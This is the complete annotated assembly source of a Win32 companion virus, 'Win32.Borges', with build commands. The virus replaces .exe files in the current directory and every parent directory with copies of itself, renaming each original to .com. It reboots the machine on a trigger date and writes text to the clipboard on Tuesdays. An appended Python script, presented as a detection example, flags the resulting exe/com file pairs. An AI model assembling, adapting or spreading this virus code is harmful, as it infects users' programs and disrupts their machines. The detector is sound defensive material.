;----------------> Win32.Borges virus by Int13h/iKX <-----------------;
; It mirrors EXE files, navigates directories with the famous dot-dot ;
; method, on September 19 reboots the machine, on Tuesdays puts a text ;
; in the clipboard. This beast works using API for all its operations, ;
; no dirty tricks are used. Just to maintain compatibility :)          ;
; Dedicated to Jorge Luis Borges, because the first tale of his book   ;
; named "The Book of Sand" is called "The Other", and it speaks about  ;
; an encounter with a younger copy of himself. The family doppelganger.;
;---------------------------------------------------------------------;
;
; tasm32 /ml /m3 borges.asm
; tlink32 /Tpe /aa /c /v borges.obj,,,import32.lib
;
.386
.model flat
locals

extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn SetCurrentDirectoryA:proc
extrn GetCurrentDirectoryA:proc
extrn GetSystemTime:proc
extrn MoveFileA:proc
extrn CopyFileA:proc
extrn GlobalAlloc:proc
extrn GlobalLock:proc
extrn GlobalUnlock:proc
extrn OpenClipboard:proc
extrn SetClipboardData:proc
extrn EmptyClipboard:proc
extrn CloseClipboard:proc
extrn GetCommandLineA:proc
extrn CreateProcessA:proc
extrn lstrcpyA:proc
extrn MessageBoxA:proc
extrn ExitWindowsEx:proc
extrn ExitProcess:proc
.data
TituloVentana   db 'Win32.Borges virus by Int13h/iKX',0
TextoVentana    db 'Made in Paraguay, South America',0
MemHandle       dd 0
Victimas        db '*.exe',0             ; search mask
SearchHandle    dd 0
Longitud        dd 0                     ; length of the current directory path
ProcessInfo     dd 4 dup (0)             ; PROCESS_INFORMATION
StartupInfo     dd 4 dup (0)             ; STARTUPINFO (only 16 of its 68 bytes are reserved here)
Win32FindData   dd 11 dup (0)            ; WIN32_FIND_DATA up to dwReserved1 (44 bytes), so
Hallado         db 200 dup (0)           ; cFileName of the found file lands here
Crear           db 200 dup (0)           ; found name with its extension changed to .COM
ParaCorrer      db 200 dup (0)           ; copy of the command line (path of this file)
Original        db 200 dup (0)           ; directory we started in
Actual          db 200 dup (0)           ; directory after each "cd .."
PuntoPunto      db '..',0
SystemTimeStruc dw 8 dup (0)             ; SYSTEMTIME
.code
Borges:
        mov     eax, offset SystemTimeStruc
        push    eax
        call    GetSystemTime
        mov     ax, word ptr [SystemTimeStruc+2]     ; wMonth
        cmp     al, 9                                ; September?
        jne     NoFqvBirthday
        mov     ax, word ptr [SystemTimeStruc+6]     ; wDay
        cmp     al, 17
        je      Adios
NoFqvBirthday:
        push    offset Original                      ; remember where we started
        push    000000C8h
        call    GetCurrentDirectoryA
        mov     dword ptr [Longitud], eax
        call    GetCommandLineA                      ; own path, normally quoted
        push    eax
        push    offset ParaCorrer
        call    lstrcpyA
        mov     edi, eax
Buscar:                                              ; find the '.' of the extension
        cmp     byte ptr [edi], '.'
        jz      ElPunto
        inc     edi
        jmp     Buscar
ElPunto:
        mov     esi, edi
        inc     esi                                  ; esi -> extension text
        add     edi, 4
        mov     byte ptr [edi], 0                    ; cut right after ".exe"
Carrousell:                                          ; infect, then "cd .." until the root
        call    InfectDirectory
        push    offset PuntoPunto
        call    SetCurrentDirectoryA
        push    offset Actual
        push    000000C8h
        call    GetCurrentDirectoryA
        cmp     eax, dword ptr [Longitud]            ; path length unchanged: root reached
        je      Salida
        mov     dword ptr [Longitud], eax
        jmp     Carrousell

InfectDirectory:
        push    offset Win32FindData
        push    offset Victimas
        call    FindFirstFileA
        mov     dword ptr [SearchHandle], eax
Ciclo:
        cmp     eax, -1                              ; INVALID_HANDLE_VALUE: no *.exe here
        je      Salida
        or      eax, eax                             ; FindNextFileA returned FALSE: done
        jnz     Continuar
        ret
Continuar:
        push    offset Hallado                       ; Crear = found name
        push    offset Crear
        call    lstrcpyA
        mov     edi, offset Crear
SeguirBuscando:
        cmp     byte ptr [edi], '.'
        jz      PuntoEncontrado
        inc     edi
        jmp     SeguirBuscando
PuntoEncontrado:
        inc     edi
        mov     dword ptr [edi], 0004D4F43h          ; 'COM',0
        push    offset Crear                         ; rename host.exe -> host.com
        push    offset Hallado
        call    MoveFileA
        push    0                                    ; bFailIfExists = FALSE
        push    offset Hallado                       ; copy this file in as host.exe
        push    offset ParaCorrer+1                  ; +1 skips the opening quote
        call    CopyFileA
        push    offset Win32FindData
        push    dword ptr [SearchHandle]
        call    FindNextFileA
        jmp     Ciclo

FillClipboard:
        push    0
        call    OpenClipboard
        call    EmptyClipboard
        push    (offset TextoVentana - offset TituloVentana)   ; size of the title string
        push    00000002h                            ; GMEM_MOVEABLE
        call    GlobalAlloc
        push    eax
        mov     dword ptr [MemHandle], eax
        call    GlobalLock
        push    eax                                  ; argument for GlobalUnlock below
        push    offset TituloVentana
        push    eax
        call    lstrcpyA
        call    GlobalUnlock
        push    dword ptr [MemHandle]
        push    00000001h                            ; CF_TEXT
        call    SetClipboardData
        call    CloseClipboard
        jmp     Run4TheNight

Adios:
        push    00000001h                            ; MB_OKCANCEL
        push    offset TituloVentana
        push    offset TextoVentana
        push    0
        call    MessageBoxA
        push    0
        push    00000002h                            ; EWX_REBOOT
        call    ExitWindowsEx
Salida:
        push    offset Original                      ; back to the starting directory
        call    SetCurrentDirectoryA
        mov     ax, word ptr [SystemTimeStruc+4]     ; wDayOfWeek
        cmp     al, 2                                ; Tuesday?
        je      FillClipboard
Run4TheNight:                                        ; run the renamed host (.com)
        push    offset ProcessInfo
        push    offset StartupInfo
        sub     eax, eax
        push    eax                                  ; lpCurrentDirectory
        push    eax                                  ; lpEnvironment
        push    00000010h                            ; CREATE_NEW_CONSOLE
        push    eax                                  ; bInheritHandles
        push    eax                                  ; lpThreadAttributes
        push    eax                                  ; lpProcessAttributes
        call    GetCommandLineA
        inc     eax                                  ; lpCommandLine (past the quote)
        push    eax
Done:
        mov     dword ptr [esi], 0004D4F43h          ; own path now ends in .COM
        push    offset ParaCorrer+1                  ; lpApplicationName
        call    CreateProcessA
        push    0
        call    ExitProcess
end     Borges
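The infection pattern the header describes (each host .EXE renamed to .COM and a copy of the infector dropped under the host's original name) leaves a recognisable pair on disk. The following is an added detection example, not part of the virus listing: it walks a directory tree, flags every .exe that has a same-basename .com beside it and whose bytes are identical to another .exe in the tree, and builds a small constructed sample tree (hypothetical names and contents) to run against.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

def companion_suspects(root):
    """Return (exe_path, sibling_com_path, sha256) for every .exe that has a
    same-basename .com next to it and whose bytes are shared with at least one
    other .exe in the tree (the mirrored-copy pattern of a companion infector)."""
    by_hash = defaultdict(list)
    pairs = []
    for dirpath, _, names in os.walk(root):
        lower = {n.lower(): n for n in names}
        for n in names:
            base, ext = os.path.splitext(n)
            if ext.lower() != ".exe":
                continue
            path = os.path.join(dirpath, n)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            by_hash[digest].append(path)
            com = lower.get(base.lower() + ".com")
            if com:
                pairs.append((path, os.path.join(dirpath, com), digest))
    # a .com sibling alone is not proof; require the .exe body to be replicated
    return sorted(p for p in pairs if len(by_hash[p[2]]) > 1)

def build_sample_tree():
    """Constructed sample: two directories, each with a 'host' renamed to .com
    and an identical small .exe dropped beside it; one pair is left clean."""
    root = tempfile.mkdtemp()
    clone = b"MZ" + b"\x90" * 64          # stand-in for the replicated body
    layout = {
        "a/calc.com": b"MZ-host-calc", "a/calc.exe": clone,
        "a/sub/edit.com": b"MZ-host-edit", "a/sub/edit.exe": clone,
        "a/sub/notes.com": b"MZ-other", "a/sub/notes.exe": b"MZ-unique",
    }
    for rel, data in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for exe, com, digest in companion_suspects(build_sample_tree()):
        print(f"suspect {exe} (sibling {com}) sha256={digest[:12]}")
```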